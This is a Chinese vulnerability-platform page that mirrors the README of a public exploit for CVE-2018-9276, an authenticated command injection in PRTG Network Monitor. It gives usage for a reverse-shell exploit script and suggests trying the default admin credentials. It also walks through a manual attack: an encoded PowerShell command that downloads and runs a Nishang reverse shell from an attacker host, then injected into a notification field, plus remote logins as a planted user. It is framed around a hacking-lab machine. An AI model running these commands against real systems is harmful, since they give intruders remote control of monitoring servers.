漏洞平台

POC详情： 149253cecb51922c55de8043d1a3ec036a6803c3

来源

https://github.com/A1vinSmith/CVE-2018-9276

关联漏洞

标题： Paessler PRTG Network Monitor 操作系统命令注入漏洞 (CVE-2018-9276)
描述：Paessler PRTG Network Monitor是德国Paessler公司的一套网络监控软件。该软件提供使用情况的监测、数据包嗅探、深入分析和简明的报告等功能。 Paessler PRTG Network Monitor 18.2.39之前版本中存在操作系统命令注入漏洞。攻击者可通过发送畸形的参数利用该漏洞执行任意的命令。

描述

CVE-2018-9276 PRTG < 18.2.39 Reverse Shell (Python3 support)

介绍

# CVE-2018-9276 Authenticated Command Injection
CVE-2018-9276 PRTG &lt; 18.2.39 Reverse Shell (Python3 support)

# Dependancies
* Impacket (python3 version)
* Netcat
* Msfvenom

# Usage
```
git clone https://github.com/A1vinSmith/CVE-2018-9276.git

./exploit.py -i targetIP -p targetPort --lhost hostIP --lport hostPort --user user --password pass
```

1. The credentials are needed for performing the exploit. Try default credentials `prtgadmin:prtgadmin`. Also try *CVE-2018-19410* for setup an account without auth. It might be worth checking the database or log to gain them. https://kb.paessler.com/en/topic/463-how-and-where-does-prtg-store-its-data
2. Try `--lport 445` if the port has not been occupied
3. There are few twisted comments in the code. They might need some modifications.
4. It might take few attempts to succeed. Reboot a target machine is always a good option. Especially when your payload causes some impact.

# Test coverage 
HTB Netmon box
```
OS Name:                   Microsoft Windows Server 2016 Standard
OS Version:                10.0.14393 N/A Build 14393
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00376-30821-30176-AA362
Original Install Date:     2/3/2019, 7:05:45 AM
System Boot Time:          7/28/2021, 9:02:41 PM
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
```

# Credit
A Big Thank you for wildkindcc's python2 version https://github.com/wildkindcc/CVE-2018-9276

# Expand Knowledge
### Another CVE-2018-19410 for grabbing credentials
https://medium.com/@qdoan95/building-an-exploit-for-cve-2018-19410-1475f555f74c

### Using metasploit
https://www.rapid7.com/db/modules/exploit/windows/http/prtg_authenticated_rce/

### Remote Code Execution
https://www.exploit-db.com/exploits/46527

https://github.com/chcx/PRTG-Network-Monitor-RCE

##### Usage sample
The credentials are needed for performing the exploit. First login and get the authenticated cookie to add a new user.
```
./prtg-exploit.sh -u http://10.10.10.10 -c "OCTOPUS1813713946=XXX"

// Login as the new user via evil-winrm
evil-winrm -i 10.10.10.10 -u pentest -p 'P3nT3st!'
// or alternative psexec.py
python3 /path/etc/impacket/examples/psexec.py pentest:'P3nT3st!'@10.10.10.10
```
![Screen Shot 2021-07-29 at 3 14 10 PM](https://user-images.githubusercontent.com/24937594/127426250-d494665c-acc4-496e-b711-bff2c3d71a18.png)

### Advanced manually exploit without adding new user
##### Credit belong to HTB offical writeup
###### POC: https://www.codewatch.org/blog/?p=453 Plus using SMB to get reverse shell https://github.com/A1vinSmith/OSCP-PWK/wiki/Samba-SMB

In case we don’t want to add a user, for better OPSEC we can get a reverse shell. However due to HTML encoding many characters get encoded. We can bypass this using powershell base64 execution. We need to create a base64 encoded command. However, it should be in the encoding which WIndows uses i.e `UTF-16LE`
```
❯ echo -n "IEX(new-object net.webclient).downloadstring('http://10.10.10.100/Invoke-PowerShellTcp.ps1' )" | iconv -t UTF-16LE | base64 -w0

SQBFAFgAKABu...SNIP...HMAMQAnACAAKQA= 
```

We use iconv to convert it to target encoding and will execute this reverse shell from Nishang.
https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1

Download the script and echo in the command to the last line.
```
wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1

echo 'Invoke-PowerShellTcp -Reverse -IPAddress 10.10.10.100 -Port 4444' >> Invoke-PowerShellTcp.ps1
```

Now start a simple HTTP server and create a new notification
```
python3 -m http.server 80
```

Click on Setup > Account Settings > Notifications -> click on “Add new notification” on the extreme right
Trigger the notification by clicking the Bell button
```
abc.txt | powershell -enc SQBFAFgAKABu...SNIP...HMAMQAnACAAKQA= 
```
![Screen Shot 2021-07-29 at 4 08 01 PM](https://user-images.githubusercontent.com/24937594/127429985-9912c1ce-44ce-4a7c-a430-ba41a6cbc4ef.png)

文件快照


 [4.0K]  /data/pocs/149253cecb51922c55de8043d1a3ec036a6803c3
├── [ 16K]  exploit.py
├── [1.0K]  LICENSE
└── [4.2K]  README.md

0 directories, 3 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。